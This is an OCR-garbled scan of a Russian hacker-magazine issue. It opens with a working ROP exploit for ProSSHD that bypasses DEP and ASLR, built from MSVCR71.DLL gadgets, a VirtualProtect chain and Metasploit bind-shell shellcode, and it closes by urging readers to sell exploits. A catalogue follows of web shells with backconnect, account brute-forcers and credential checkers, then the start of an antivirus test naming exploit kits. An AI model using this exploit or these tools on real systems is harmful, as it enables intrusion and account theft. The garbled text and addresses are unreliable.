мер, у нас адрес возврата защищен с помощью метки (/05) и тогда мы 
эксплуатируем уязвимость через 5ЕН, или у нас вообще переполнение 
не в стеке, а в куче, тогда получается, что Е5Р будет указывать на не- 
подконтрольную хакеру область. В таком случае первый и единствен- 
ный контролируемый адрес (5ЕН-дескриптора — в первом варианте] 
указывал на код, который вернул бы указатель Е5Р на стек (или кучу 
— во втором варианте) с контролируемыми данными, чтобы первый же 
РЕТЫ вернул нас в русло РОР. То есть, первый адрес должен указывать 
на что-то типа: 

асісі езр, ОхХХ 
гебп 

Или если в каком-то регистре лежит указатель на наши данные: 

шоѵ езр, есх 
гебп 

; или 

хсйд есх, езр 
геРп 

Но в нашем случае это не нужно, так что продолжим изучать боль- 
ного. В качестве скальпеля я буду использовать ІттипТу БеЬиддег 
и плагин к нему от известного бельгийского хакера согеІапсОсІЗг. 
Очевидно, что в качестве буфера можно передавать все, кроме 
нулевых байтов, поэтому для РОР нам нужна статическая библиотека, 
не содержащая нулевых старших разрядов в адресе. Более того, нам 
нужна библиотека, которая не поддерживает А5БВ, чтобы эксплуати- 
ровать уязвимость в ѴѴі псіоѵѵб 7. Использовав вышеуказанный плагин 
к дебаггеру, можно обнаружить в составе дистрибутива РгоЭЭНБ 
такие библиотеки: МЕС71.0ЕЕ и М5ѴСВ71.ВЕБ. Я буду использовать 
обе библиотеки в качестве доноров кода для РОР; таким макаром 
мы обойдем БЕР + А5БВ. Как же обойти ВЕР? Взглянув на список 
используемых этими модулями функций, можно заметить вызов 
ѴігРиа ІРгоРесРІ) по адресу 0х7С3528ББ (М5ѴСР71 .БИ). Это отличное 
решение; поскольку из-за А5БР адрес этой функции нам неизве- 
стен, то использование в качестве «проводника» кода с вызовом из 
М5ѴСР71 .БИ решит задачу. Напомню, что эта функция может менять 
параметры доступа к страницам памяти, так что с помощью нее мы 
сделаем стек исполняемым. Вот, собственно, и все — шеллкодуже 
там, просто передадим ему управление после вызова ѴіііиаІРгоІесІ. 
Параметры для ѴігіиаІРгоІесІ выглядят так: 



куда запишется ответ (старые флаги) 

) ; 

В одной из предыдущих статей я отказался от использования этой 
функции для обхода БЕР, так как в качестве параметров необхо- 
димо использовать нулевые байты. Вот тут-то и поможет РОР. Еще 
деталь: если взглянуть на код вызова ѴігІиаІРгоІесІ из МБѴСР71. 
БИ, то видно, что следующий адрес возврата, который будет 
взят по РЕТЫ, зависит от регистра ЕВР. Так как следующий адрес 
должен передавать управление на стек (уже исполняемый], то надо 
рассчитать так, чтобы после ЕВР-0х58 и БЕАѴЕ нас откинуло на 
нужный адрес. 

7С3 52 8ББ САШ 

ШОКВ РТР БЗ : [<&КЕРБЕБ32 . ѴігРиаІРгоесР> 



7С3528ЕЗ 


ЬЕА Е5Р,ШОКБ РТР 33: [ЕВР-58] 


7С3528Е6 


РОР ЕБІ 


7С3528Е7 


РОР ЕЗІ 


7С3528Е8 


РОР ЕВХ 


7С3528Е9 


ЬЕАѴЕ 


7С3528ЕА 


РЕТЫ 


Итого, буфер 


в стеке надо сформировать так: 



0x00 : 0х7СЗ 52 8ББ 
0x04 :АББРЕЗЗ_1 
0x08 : 0х00000ХХХ 
0х0С: 0x00000040 
0x10 :АББРЕЗЗ_2 



-- адрес вызова ѴігРиаІРгоРесР 
-- любой адрес страницы стека 
-- любое не большое число 
-- РЕАБ_ШІТЕ_ЕХЕСІІТЕ 
-- адрес из стека, меньший ЕЗР 



Поясню. Каждая строчка — это 4 байта в стеке. Первая строчка 

— адрес вызова Ѵі гіиа ІРгоІесІ; из М5ѴСВ71.ВЕБ. Вторая строчка — 
первый параметр функции, а именно — адрес страницы, которую мы 
хотим отредактировать. Мы хотели отредактировать стек, поэтому 
годится любой адрес из стека, значения это не имеет, так как права 
даются на всю страницу целиком. Далее идет третий параметр — 
размер блока, который опять же значения не имеет, так как права 
даются на всю страницу. Но надо учесть, что большое число сюда 
пихать нельзя, иначе Ѵі гіиа ІРгоЕесІ: будет ругаться. И ноль нельзя. 

В итоге — любое положительное не большое число. Последний 
параметр — адрес, куда запишутся текущие права страницы. Же- 
лательно, чтобы этот адрес был либо за вершиной стека, либо ниже 
шеллкода — это для того, чтобы не затереть что-нибудь важное. В 
этой конструкции во всех параметрах присутствуют нулевые байты. 
Адреса стека начинаются с нулевого байта и имеют вид 0x001 2ХХХХ. 
Про размер и маску прав — итак понятно. Поэтому-то нам и поможет 
ВОР. Иначе никак. ЛТ 5РВАѴ тут неприменим, да и ВЕР для процесса 
отключить не всегда возможно. Так что будем писать ВОР-программу 

— это 1 00% решение при данных условиях. Выглядеть это будет так: 



ѴігРиаІРгоРесР ( 

Ш ЬРѴОІВ ІрАсМгезз, //указатель на адрес па- 
мяти 

Ш ЗІ2Е_Т бдлЗізе, //Размер памяти — 0x1 

Ш ВШРВ РІБетлРгоРесР , //флаг — 0x40 

ІМ РБѴЮРБ ІрРІОІбРгоРесР //указатель на память, 



0x000 :АББР_1 - КОР-инструкции 

0x004 :АББР_2 

0хХ00 :АББР_Х 

0хХ04 : 0х7СЗ 52 8ББ -- ѴігРиаІРгоРесР 
0хХ08 :АББРЕЗЗ_1 
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ОхХОС : ОхОООООХХХ 
ОхХІО : 0x00000040 
ОхХ14 :АББКЕ38_2 
ОхХІ 8 : КЕТ_Е8Р 
ОхХІС: 0x90909090 
0хХ2 0 : 8НЕББС0ВЕ 



— прыжок на ОхХОС 
-- ЫОР'з и шеллкод 



Чтобы сгенерировать значение третьего параметра для ѴігІиаІРгоІесІ, 
которое должно быть равно 0x40, нам понадобится регистр ЕАХ, поэто- 
му теперь перегоним адрес стека, куда будем копировать параметры, 
в ЕСХ. После этого ЕАХ затирается. Собственно, далее все команды 
из созданного мною списка могут работать только с регистрами ЕАХ и 
ЕСХ. 



ПОР-инструкции должны сформировать и сохранить параметры 
ѴіііиаІРгоІесІ: по адресам 0хХ08, ОхХОС, ОхХІ 0, ОхХІ 4. Очевидно, что эти 
адреса также надо знать заранее. Тут нам поможет сам РгоЗЗНО. Если 
обратить внимание, то в момент атаки регистр ЕБІ и ЕВР указывают 
на данные в стеке с постоянным смещением относительно Е5Р. 
Условимся, что ЕОІ или ЕВР и будут указывать на то место, где будут 
параметры. Разница между ЕОІ и Е5Р, например, всегда составляет 
1049 байт. Этого вполне достаточно для РОР-программы, а остаток, 
который получится между РОР-программой и вызовом ѴіііиаІРгоІесІ, 
можно заполнить пустыми указателями — РЕТІЧ. Получится этакий 
аналог І\ІОР в контексте РОР. 



ІТ’З АЫѴЕ! 

Начнем собирать нашего Франкенштейна. Напомню — нас интере- 
суют различные небольшие кусочки кода, которые идут непосредст- 
венно перед инструкцией РЕТІЧ. Этот код не должен содержать 
других вызовов или сильно влиять на стек. Кроме того, он не должен 
затирать нужные нам для дальнейшей работы регистры. Чтобы это 
все вообще заработало, нам нужны такие кусочки, которые позво- 
лят работать как минимум с двумя регистрами, позволив менять 
значения между ними и записывать по указателю. Как их найти? 

К сожалению, когда я писал этот эксплойт, согеІапсОсІЗг еще не 
реализовал функционал по поиску РОР-кусков (гаджетов) в своем 
плагине, и мне пришлось искать все вручную. Но к моменту под- 
готовки статьи Питер Ван Эйкхоут (РеіегѴап ЕескЬоиЫе — это 
настоящее имя согеІапсОсІЗг] все-таки добавил нужный функционал 
и попросил меня проверить его, что я с радостью и сделал. По сути, 
плагин выполнил поиск команды ‘НЕТІЧ’ в различных вариациях в 
коде нужных мне модулей и сформировал текстовый файл со списком 
фрагментов. Анализ получившегося файла говорит нам, что весь 
такой РОР-код достаточно однообразен. Это связано с тем, что в 
большинстве случаев функции перед выходом записывают что-то в 
ЕАХ, восстанавливают пару регистров и выходят. Более редкий ва- 
риант — запись по адресу ЕАХ значением другого регистра. В итоге 
я подобрал решение, которое позволило мне скопировать значение 
из ЕБІ (адрес, где будут сохранены параметры) в регистры ЕАХ и ЕБХ. 
Кроме того нашлись команды, позволяющие копировать по адресу из 
ЕАХ, значение ЕБХ. Так задача решилась. Однако на деле не все так 
просто, поэтому я лучше распишу программу подробно. Все адреса 
в эксплойте надобно представлять разрядами задом наперед (вдруг 
кто забыл). 



" \х27\х34\х34\х7С" . # МОѴ ЕСХ, ЕАХ / МОѴ ЕАХ, ЕЗІ / 

РОР ЕЗІ / КЕТЫ 10 

" \хЗЗ \хЗЗ \хЗЗ \хЗЗ " . # это будет в Е8І 

Так, адрес уже в ЕСХ, теперь в ЕАХ надо как-то запихнуть значение 
0x40. Вариантов масса, но самый экономичный по количеству гадже- 
тов — это засунуть в ЕАХ значение -0x40, а затем вызвать ІЧЕС ЕАХ. 
Минус на минус — будет плюс. Дело в том, что -0х40=0хЕЕЕЕЕЕС0, то 
есть нету нулевых байтов, и мы можем передать это через стек, забрав 
инструкцией РОР ЕАХ. Только надо не забыть добавить после следую- 
щего адреса возврата 16 байт мусора, так как предыдущая инструкция 
была РЕТІЧ 0x1 0. 



" \хС1\х4С\х34\х7С" . 

" \хЗ 3 \хЗ 3 \хЗ 3 \хЗ 3 " . 
" \хЗЗ \хЗЗ \хЗЗ \хЗЗ " . 
" \хЗ 3 \хЗ 3 \хЗ 3 \хЗ 3 " . 
" \хЗ 3 \хЗ 3 \хЗ 3 \хЗ 3 " . 

" \хС0\хЕР\хРР\хРР м . 
" \х05\х1е\х35\х7С" . 



# РОР ЕАХ / КЕТЫ 

# 

# это перепрыгиваем 

# это перепрыгиваем 

# это перепрыгиваем 

# это перепрыгиваем 

# 

# -0x40: это будет в ЕАХ 

# ЫЕС ЕАХ / КЕТЫ 



Ну вот. Мы получили в ЕАХ требуемое значение — 0x00000040. 

В ЕСХ у нас указатель на место, где мы готовим параметры для 
Ѵі гіиа ІРгоІесІ;, так что следующий фрагмент запишет значение на его 
законное место. 



" \хс8\х03\х35\х7С" . # МОѴ ВЗ:[ЕСХ], ЕАХ / КЕТЫ 

Теперь скопируем адрес из ЕСХ обратно в ЕАХ. 

" \х40\ха0\х35\х7С" . # МОѴ ЕАХ, ЕСХ / КЕТЫ 

Теперь у нас в обоих регистрах адрес на третий параметр 
Ѵі гіиа ІРгоІесІ; (-0x40). Это же значение годится и для первого 
параметра этой функции — адреса страницы, которую мы модифи- 
цируем. 

Поэтому далее я уменьшаю значение ЕАХ на 12 (три слова), 
чтобы он указывал (со сдвигом на 4 байта) на место для первого 
параметра. 



эксплойт 

Сначала формируем часть буфера, которая идет до перезаписи адреса 
возврата. Содержимое этого буфера значения не имеет. 

$1и22 = " \х41"х491 . 

Перезаписываем адрес возврата указателем на первый фрагмент 
ВОР-программы. Этот код копирует указатель на место в стеке (кото- 
рый у нас стабильно в ЕБІ) в регистр ЕАХ. 

" \х9Е\х07\х37\х7С" . # МОѴ ЕАХ, ЕВІ / РОР ЕВІ / РОР 

ЕЗІ / КЕТЫ 

Так как приведенный выше код забирает из стека 8 байт (затирая ими 
регистры ЕБІ и Е5І), то в буфер мы должны записать эти 8 байт, после 
которых будет указатель на следующий фрагмент. 

" \х11\х11\х11\х11 " . # это будет в ЕВІ 
" \х22 \х22 \х22 \х22 " . # это будет в Е8І 



" \хАІ\х1В\х34\х7С"х12 . # БЕС ЕАХ / КЕТЫ 

Теперь скопирую значение ЕАХ по адресу ЕАХ+4. В итоге у нас будет 
записан первый параметр. 

" \х08\х94\х16\х7С" . # МОѴ Б8 : [ЕАХ+0х4 ] , ЕАХ / КЕТЫ 

Увеличим ЕАХ на 4 байта. 

" \хВ9\х1Е\х34\х7С"х4 . # ІЫС ЕАХ / КЕТЫ 

Теперь ЕАХ указывает на сохраненный первый параметр, зато 
ЕАХ+4 указывает на то место, где должен быть второй параметр — 
размер памяти. Как я писал выше, этот параметр может быть любым 
положительным, но не очень большим числом. По-моему, число 1 
как раз таким и является. Поэтому сохраняем его на месте второго 
параметра. 

" \хВ2\х01\х15\х7С" . # МОѴ [ЕАХ+0х4], 1 
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Сформированный плагином список снабжен 
полезными комментариями типа «данный адрес 
содержит разряды в пределах АБСМ-таблицы». 



Остался последний параметр — место, куда будет сохранен вывод 
функции ѴігіиаІРгоІесІ:. Я решил его сделать где-нибудь в стеке до 
адреса вызова самой функции. То есть в момент вызова это место бу- 
дет уже меньше регистра ЕЗР и на логику никак не повлияет. Поэтому 
уменьшаем ЕАХ аж на 16 байт. 

" \хАІ\х1Б\х34\х7С"х16 . # БЕС ЕАХ / КЕТЫ 



Скопируем полученное значение в ЕСХ. 



" \х27\х34\х34\х7С " . 
РОР Е8І / КЕТЫ 10 
" \хЗ 3 \хЗ 3 \хЗ 3 \хЗ 3 " . 
" \х40\ха0\х35\х7С" . 

" \хЗЗ \хЗЗ \хЗЗ \хЗЗ " . 
" \хЗЗ \хЗЗ \хЗЗ \хЗЗ " . 
" \хЗЗ \хЗЗ \хЗЗ \хЗЗ " . 
" \хЗ 3 \хЗ 3 \хЗ 3 \хЗ 3 " . 



# МОѴ ЕСХ, ЕАХ / МОѴ ЕАХ, Е8І / 

# это будет в ЕЗІ 

# МОѴ ЕАХ, ЕСХ / КЕТЫ 

# 

# это перепрыгиваем 

# это перепрыгиваем 

# это перепрыгиваем 

# это перепрыгиваем 



Значение мы сохранили пока что в ЕСХ. ЕАХ — в положение, чтобы 
ЕАХ+20 указывал на место для последнего, четвертого, параметра (это 
будет как раз за сохраненным в стеке 0x40]. 



" \хВ9\х1Е\х34\х7С"х4 . # ІЫС ЕАХ / КЕТЫ 



Ну и записываем последний параметр на свое место. 

" \хЕ5\хбВ\х36\х7С" . # МОѴ Б8 : [ЕАХ+0х14 ] , ЕСХ 

Теперь у нас в стеке осталось 41 2 байт от последней строчки до перво- 
го параметра. 

Еще 4 байта уйдут на адрес вызова ѴігШаІРгоІюсІ непосредственно 
перед первым параметром — итого 408 байт надо заполнить пустыми 
переходами. 

" \хВА\х1Е\х34\х7С"х204 . # КЕТЫ 

Теперь указатель на место, где будет вызов ѴіОиаІРгоІюсТ 

" \хББ\х28\х35\х7С" . # САБЫ ѴігБиаІРгоБесБ / БЕА ЕЗР, 

[ЕВР-58] / РОР ЕБІ / ЕЗІ / ЕВХ / КЕТЫ 

Дальше идет место в стеке, где будут сохранены параметры для функ- 
ции. С этим пространством работает наша РОР-программа. 



" ААААВВВВССССББББ " . 



Следующий адрес увеличит значение указателя вершины стека на 1 2 
байт. Зачем я это сделал — уже забыл :). 

" \х1А\хЕ2\х35\х7С" . # АББ ЕЗР, ОхС / КЕТЫ 

"ХХХУУУ222123 " . # Перепрыгнем, изменив указа- 

тель 




РОР за работой 




Рабочий, универсальный и безотказный эксплойт 
— пригодится на очередном пентесте 



Теперь наш стек уже исполняемый, и надо передать управление 
на код из стека, который будет ниже. Сделаем это нетривиально, 
вспомнив мою предыдущую статью про ЛТ 5РРАУ, где исполь- 
зовалось смещение в адресе инструкций, и в зависимости от 
первого байта инструкции менялся исполняемый код. Так, у нас 
по адресу 0х7с345с2е содержится код АЫ0Р5 ХММО, ХММЗ. Но 
если добавить к этому адресу 2 байта, то оставшиеся опкоды 
проинтерпретируются как РІІ5Н ЕЗР / ВЕТІЧ. То есть мы засунем в 
стек адрес вершины, а затем инструкция ВЕТЫ заберет его, пере- 
дав в ЕІР. 

" \х30\х5С\х34\х7С" . # РБЗН ЕЗР / КЕТЫ 

Весь дальнейший код будет уже не адресами, а полноценным би- 
нарным кодом — шеллкодом. Для начала я все же сунул немножко 
ІМОР’ов. 



"\х90"х14 . # ЫОР 

Ну, а дальше — шеллкод из Метасплойта (у меня ЬіпсІ зЬеІІ на 4444 
порту]. 

$зПе11; # Шеллкод 

ВЫВОДЫ 

Что можно сказать. Очевидно, что предлагаемые защитные механизмы 
снижают риски, но незначительно. Также растет сложность написания 
эксплойтов, что создает на этом рынке дефицит рабочей силы. Сразу 
после публикации данного сплойта, мне пришло письмо с предложе- 
нием о работе: написание приватных эксплойтов для Осіау и не очень 
приватных уязвимостей по ценам, в 300% превышающим предложения 
для Осіау багов у Юеіепзе или 201. Я, конечно, жадный, но ленивый — 
мне моей работы хватает. А вот ты теперь знаешь, как писать эксплой- 
ты, которые с радостью купят за много $$$. Дерзай! :] т 
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Х-Т00І.З 

ПРОГРАММЫ ДЛЯ ХАКЕРОВ 




П РО ГРАМ МА: АгхРискіпдНазЬЗ 
ОС: ѴѴІЫ00ѴѴ5 2000/ХР/2003 
5ЕКѴЕК/ѴІ5ТА/2008 5ЕРѴЕР/7 




Удобное восстановление хешей 

АВТОР: АРХѴѴОІ.Р 

Уже знакомая тебе по предыдущим выпускам 
рубрики команда сайта ѵѵеЬхакер.пеІ с радостью 
готова представить свою очередную хак-утилиту. 
Вообрази ситуацию, что ты нашел какой-либо 
хеш (тб5, МуБОб, 5Ьа1) итебе необходимо его 
расшифровать. Что делать? Прогонятьданный 
хеш по бесчисленным онлайн-сервисам или 
ждать, когда его сбрутитспециализированная 
программа? Есть способ лучше! Просто за пускай 
АгхРискіпдНазЬЗ, вбивайтуда свой хеш и начи- 
най парсинг! Программа сама пройдет по списку 
открытых сервисов и выведет результат на экран 
вудобной форме. 

Функционал проги следующий: 

• Многопоточность (10 потоков — про- 
верка по 10 сервисам сразу) ; 

• Поиск тс15 , МуЗОЬ, ЗНаІ хешей; 

• Редактирование пользователем спис- 
ка онлайн-сервисов по расшифровке 
хешей (файл зегѵегз.іпі) ; 

• Поиск одновременно нескольких хешей 
по списку; 

• Загрузка хешей из файла; 

• Автоопределение типа хеша; 

• Сохранение результатов работы про- 
граммы ; 

• Чекер рабочих и нерабочих сервисов; 

• Прилагаемый к проге хелп (папка . /Ъеір) . 

Если утебя есть какие-то вопросы по работе 
утилиты, направляй их прямиком автору втопик 

ууеЬхакер.пе1Логит/зЬоу\ДЬгеас1.рЬр?1=4753 . 

ПРОГРАММА: РР51.0 РЕИ. 
ѴѴЕВ-5НЕЫ- 
ОС*ЫІХ/ѴѴІМ 
АВТОР: РА5НКЕІ.А 

Существует огромное количество веб-шеллов, 
написанных на РНР. В то же время шеллы на 




Веб-шелл на Регі 

других скриптовых языках можно пересчитать 
по пальцам. Так что советую не проходить 
мимо перлового веб- шелл а РР5 1 .0 от мембе- 
ра Античата, Пашкелы. 

Данный скриптобладает практически всеми 
возможностями своихстарших РНР-собратьев: 

• Авторизация (дефолтный пароль 
"гооб" ) ; 

• Отображение системной информации; 

• Листинг директорий и файлов; 

• Загрузка, скачивание, редак- 
тирование, просмотр, удаление 
файлов ; 

• Выполнение системных команд; 

• Выполнение сбитое! , боисбц гір, ипгір 
операций с файлами и папками в один 
клик ; 

• Консоль; 

• Простой Му 8<2Ь -менеджер; 

• Выполнение Ьасксоппесб ; 

• Выполнение Регі-кода из веб-формы; 

• Самоудаление ; 

• Работа через РОЗТ- запросы. 

Все вопросы и пожелания по данному скрипту 
направляй авторѵвтемѵ Іогит.апІісЬабги/ 
іЬгеас! 1 981 19.Ытб 

ПРОГРАММА: С6І ѴѴЕВ5НЕІ.І. 

ОС: *ЫІХ 

АВТОР: ОКБ 

Разужзашла речьо веб-шеллах, написанных на 
языках, отличных от РНР, то представляютвоему 
вниманию ССІ ѵѵеЬзЬеІІ — пито но векую утилиту, 
которая содержит в себе следующие хак-функ- 
ции и особенности: 

• Авторизация; 

• Просмотр, редактирование, загруз- 
ка , скачивание боисЬ- , сЬшоб-файлов ; 

• Наглядный листинг директорий с 
возможностью перехода по ним; 

• Выполнение серверных команд; 

• Выполнение кода на Руббюп ' е через 
веб -форму; 



• Віпб рогб/Васксоппесб (без созда- 
ния дополнительных файлов во времен- 
ных директориях) ; 

• Выбор кодировки для работы шелла; 

• Стабильность . 




Веб-шелл на РуІНоп 



Автор с радостью будет готов ответить на любой 
твой вопрос по шеллу втопике ЬНрУЛогит. 
а пЬсЬабги/5Ьо\л/1:ЬгеасІ.рЬр?1= 147269 . 

ПРОГРАММА: Ркохѵ Зсаыыер 

ОС^ЫІХ/ѴѴІЫ 

АВТОР: 5НАККѴ 

На страницах рубрики уже неоднократно описы- 
вались различныесканеры проксей, отличи- 
тельной особенностью которых былото, что они 
сканили известные паблик-ресурсы с халявны- 
ми списками прокси-серверов. Представляю 
твоему вниманию принципиально иную прогу 
— РгохуЗсаппег от некоего ЗЬагку. 

Данная утилита основана на принципе скана 
заданного диапазона ІР-адресов, проверяемо- 
го на наличие проксиков. Из дополнительных 
плюсов сканера можно отметитьто, что он 
поддерживает многопоточность, а также сам 
чекает найденные п рокси ки на валидность с 
помощью гугла. 

Запуск РгохуЗсаппег'а происходит следующим 
образом: 

1. Запускаем скрипт ргохузсаппег.рі; 

2 . Вводим нужные для скана данные: 

• 51а Н ІР (начальный ІР диапазона, например, 
192.168.1.1); 

• Епб ІР (конечный ІР диапазона, например, 
192.168.255.255); 

Сканер проксей 





г — 



г — - Щ 
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• Роіі (какой портсканить, например, 3128); 

• Тітеоиі (таймаут прокси в секундах, например, 1 0] ; 

• ТЬгеасІз (потоки, например, 50); 

• Рііе ‘РогдоосІ ргохіез (в какой файл сохранять 
гуды, например, ргохіез.М). 

Каквидишь, добывать свежие прокси самому не 
такуж и сложно, еп]'оу! 



ПРОГРАММА: І.АМЕ5САЫ2 С ПЛА- 
ГИНОМ АМТІРАОМІЫ 
ОС: ѴѴІЫООѴѴБ 2000/ХР/2003 
5ЕВѴЕГС/ѴІ5ТА/2008 5ЕРѴЕР/7 
АВТОР: КЕйБН 




Сканер портов 



Баппе5сап2 — это небольшой и крайне функцио- 
нальный сканер портов с поддержкой плагинов. 
Функционал проги впечатляет: 



• Многопоточность; 

• Пинг хоста перед сканированием; 

• Сохранение хостов в локальной базе 
данных с записями вида «хост-груп- 
па», где «группа» имеет статусы «не 
сканирован», «ир», «боѵт» или «еггог» 
(данная фича позволяет прервать 
сканирование, а потом продолжить его 
с заданного места, либо перескани- 
ровать какую-нибудь часть хостов с 
помощью кнопки «Вернуть в очередь») ; 

• Редактирование любой группы в базе 
данных булевыми операциями с блоками 
адресов ; 

• Экспорт и импорт базы данных диа- 
пазонов в формат .сзѵ с возможностью 
выбора разделителя; 

• Экспорт результатов сканирования в 
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СЗѴ или НТМЬ; 

• Поддержка плагинов с очень простым ВПК; 

• Расширенная работа с диапазонами 
ІР-адресов . 

Отдельно сто ит заде ржать внимание на плагине 
апбгасітіп для І_ате5сап2. Итак, данный плагин 
предназначен для восстановления забытых па- 
ролей на габтіп 2.0, 2.1 и 2.2 методом брутфорса. 
Особенности плагина: 

• Брут по словарю; 

• Полностью своя реализация протоко- 
ла авторизации; 

• Выдача результатов брута в окно 
сканера и в лог; 

• Защита от лагов (пытается соеди- 
ниться с хостом до тех пор , пока тот 
не скажет, верный пароль или нет) . 



Еще одной особенностью сканера является 
удобная система горячих клавиш: 




іпз — добавить диапазон для сканиро- 
вания; 

69 — настроить количество потоков и 
пинг ; 

зЫ66+69 — настроить параметры пла- 
гинов ; 

65 — начать сканить; 

67 — сохранить результаты в НТМЬ; 

62 — сохранить таблицу; 

63 — загрузить таблицу; 
сбгі+іпз, далее выбрать «оффлайн» и 
«ошибка» — пересканировать указание 
группы . 

Также настоятельно рекомендую посетить офи- 
циальный сайт автора программы: ЬНрТ/гесІзЬ. 
Ік — здесьты сможешь найти множество других 
полезных в нашем деле утилит. 

ПРОГРАММА: К5АЕМАІІ.СНЕСКЕК2.0 
ОС :ѴѴІ N йОѴѴЗ 2000/ХР/2003 
5ЕКѴЕК/ѴІ5ТА/2008 5ЕКѴЕК/7 
АВТОР: В5АКЕІ.ІАВІ.Е5 




Рад представить тебе утилиту гзаЕМаіІСЬескег 
— многопоточный автоматический чекер е-таіі 
адресов с возможностью «передышки». Особен- 
ности чекера: 

• Очень маленький размер по сравнению 
с аналогами; 

• Подсветка статусов; 

• Возможность приостановки и возоб- 
новления процесс чека; 

• Отображение состояния потоков чека; 

• Отображение числа просмотренных и 
находящихся в очереди е-таіі адресов; 

• Работа в двух режимах (открытое и 
защищенное соединения) ; 

• Работа практически со всеми РОРЗ- 
с ерв ерами; 

• Возможность сохранения гудов; 

• Встроенный антидубль адресов (отображе- 
ние числа отброшенных одинаковых строк) ; 

• Возможность задавать таймаут со- 
единения ; 

• Возможность делать паузу на указан- 
ное время после определенного коли- 
чества прочеканных адресов; 

• Поддержка двух видов списка (изег© 
зегѵег . ботеп; раззтлгогб и изег@зегѵег. 
ботеп:раззтлгогб) ; 

• Работа на .Шеб Ргатеѵгогк 2 . 0 или выше. 



" соппесбеб == баізе" — отображается, 
если соединение не было установле- 
но или было принудительно разорвано 
удаленным сервером; 

"іпѵібе == баізе" — отображается, 
если сервер не прислал приглашение 
после успешного установления соеди- 
нения (возможно, РОРЗ -сервер отклю- 
чен и /или порт прослушивает другая 
служба) ; 

"изег == -егг" — отображается, если 
имя пользователя не соответствует 
стандарту РОРЗ -сервера; 

"баб" — отображается, если пароль 
неверен; 

"дооб" — отображается, если пароль 
верен. 

Ах да, этотчекер написал член полюбившейся 
тебе команды ѵѵеЬхакер.пеЕ так что любые 
вопросы направляй втопик ЫірУ/ѵѵеЬхакер.пеі:/ 
Іюгит/5Ьоѵѵ1:ЬгеасІ.рЬр?і:=6348 . 

ПРОГРАММА: .ІВВІ.ОАВВЕРВРІІТЕ 
ВѴ ЬѴТОЕѴОЕЫ Ѵ.0.1 
ОС : ѴѴІЫйОѴѴЗ 2000/ХР/2003 
5ЕВѴЕВ/ѴІ5ТА/2008 5ЕВѴЕВ/7 
АВТОР: ЬѴТ6ЕѴ6ЕЫ 

Надоело брутить давно набившие всем оскоми- 
ну аськи? Пора переходить на джаббер :). Итак, 
\ЬЫ —это первый публичный ЗаЬЬег-брутфорс. 
Брутобладает следующими фичами: 

• Написан на Ѵізиаі Вазіс без исполь- 
зования сторонних компонентов для 
работы с протоколом хшрр; 

• Многопоточность (максимум 100 по- 
токов) ; 

• Смена паролей на обрученных 
аккаунтах; 




^ЬЬег-брутфорс 

• Сворачивается в трей; 

• Шаблонизированная запись в дооб. 



Программа может отображать следующую ин- 
формацию о статусах чека мыльников: 

«не проверялось» — отображается, 
если данное мыло еще не чекалось; 

«в очереди. . .» — отображается, ког- 
да строка мыло находится на очереди 
для чека; 



6x6; 

• Возможность остановки и продолже- 
ния процесса брута; 

• Возможность выбора ШаЬЬег-сервера 
для брута. 



Ответы на вопросы по работе проги ищи 
на Асечке: Іюгит.азесЬка.ги/гбоѵѵіЬгеасІ 
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МАІЛ/ѴАРЕ 



Василий Бердников 



ѵаЬегШіпЬох.ги 




Выбираем 

халявный антивирус 

Что лучше: АѴ6, АѴІГСА или АѴАЗТ? 



Каждый читатель ] [ знает массу способов, как накорячить антивирус, чтобы он не 
определял даже самую злую малварь. В то же время, потребность в каком-то антивирусе 
все же есть: хотя бы и для борьбы с аиіошп-троями, приходящими с гостевыми 
флешками. Тут первым делом в голову приходят бесплатные антивирусы: АѴ6, АѴІГСА и 
АѴАЗТ. Нам стало интересно проверить их в реальном бою со свежими сплойтпаками, а 
заодно и сравнить результаты с платными решениями типа Касперского. 



МЕТОДИКА 

Размышляя над методикой этого теста, мы решили шагать «от 
заразы». Понятно, что большинство пользователей подцепляет опас- 
ную малварь через бажный браузер, либо через его уязвимые компо- 
ненты. Наиболее часто используются атаки на старые браузеры ІЕ6 
и ІЕ7, либо на продукты компании АбоЬе (ЕІазЬ Ріауег, РОЕ Реабег), 
РеаІРІауег и 6АѴА. Не является безопасной и восьмая версия ІЕ, как 
ты мог убедиться из статей Леши Синцова в прошлых номерах ][. 
Опасность таких атак состоит в том, что можно подцепить троя, про- 
сто посетив свой любимый сайт, который в один прекрасный момент 
окажется взломанным. В таком случае обычно в исходнике сайта 
появляется обфусцированный скрипт или іітаппе, ведущий на паленый 
сайт, где расположен пакет эксплойтов. 

На рынке существует достаточно много различных сплойтпаков, а 
некоторые старые даже лежат в свободном доступе на всевозможных 
хакерских форумах — найти их легко, было бы желание. 

На текущий момент наиболее распространенными и часто используют- 
ся следующие наборы: 

Еіеопоге Ехріоікз раск 
Ркоепіх ехріоік кік 
ЫеоЗрІоік 
УЕЗ ехріоік кік 
ЗіЬегіа Ехріоікз кік 



Зео Зріоік раск 

Сгішераск Ехріоік Зузкеш 

Они несколько отличаются друг от друга набором эксплойтов, качест- 
вом шеллкодов, ценой, поддержкой. Но, в общем-то, весьма похожи 
друг на друга. Их характеристики приведены в соответствующей врез- 
ке — советую ознакомиться, чтобы лучше понимать, с чем мы имеем 
дело. 

Сам код эксплойтов, как правило, обфусцирован для затруднения его 
анализа и детекта антивирусами. Стоит отметить наличие во всех 
связках эксплойта МОАС (М506-014), патч для которого вышел еще 
в мае 2006 года. Именно этот сплойт имеет высокий пробив на ІЕ6 и 
занимает высокий процент в общей статистике. Это свидетельствует 
о том, что многие пользователи не утруждаются поставить обновле- 
ния системы, тем самым рискуя «схватить» таіѵѵаге. Кроме того, за 
последний год изменился тренд использования уязвимостей ІЕ6/7 на 
продукцию компании АбоЬе — в частности АсгоЬаІ: Реабег, а также на 
продукты компании Огасіе Согрогабоп — 6АѴА. Использование этих 
экплойтов позволяет производить атаки не только на ІЕ, но и другие 
браузеры. 

Рассмотрим часто используемые эксплойты под АсгоЬаІ: Реабег: 

АбоЬе АсгоЬаІ Реабег 

АсІоЪе СоІІаЬ . соІІесСЕтаіІІп^о — СѴЕ-2007-5659 
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ХАРАКТЕРИСТИКИ СПЛОЙТПАКОВ 



Главная характеристика любого сплойтпака — про- 
бив, то есть соотношение между числом заразив- 
шихся компьютеров и общим числом «посетителей» 
сплойтпака. У актуальных паков пробив составляет от 
5 до 20%, а в среднем — около 10%. 

Многие сплойтпаки открыто продаются на черном 
рынке, причем их стоимость, состав и тактико- 
технические характеристики могут весьма сущест- 
венно отличаться. 

• РИоепіх ехріоіі раск 

Состав: МОАС, М5 ОШсе ЗпарзЬоІ, ОКЕ, ЕІазЫО, 
